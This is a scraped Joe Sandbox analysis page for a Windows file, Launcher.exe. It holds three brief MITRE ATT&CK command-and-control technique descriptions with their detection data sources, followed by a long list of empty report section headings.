Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Launcher.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Windows Analysis Report
Launcher.exe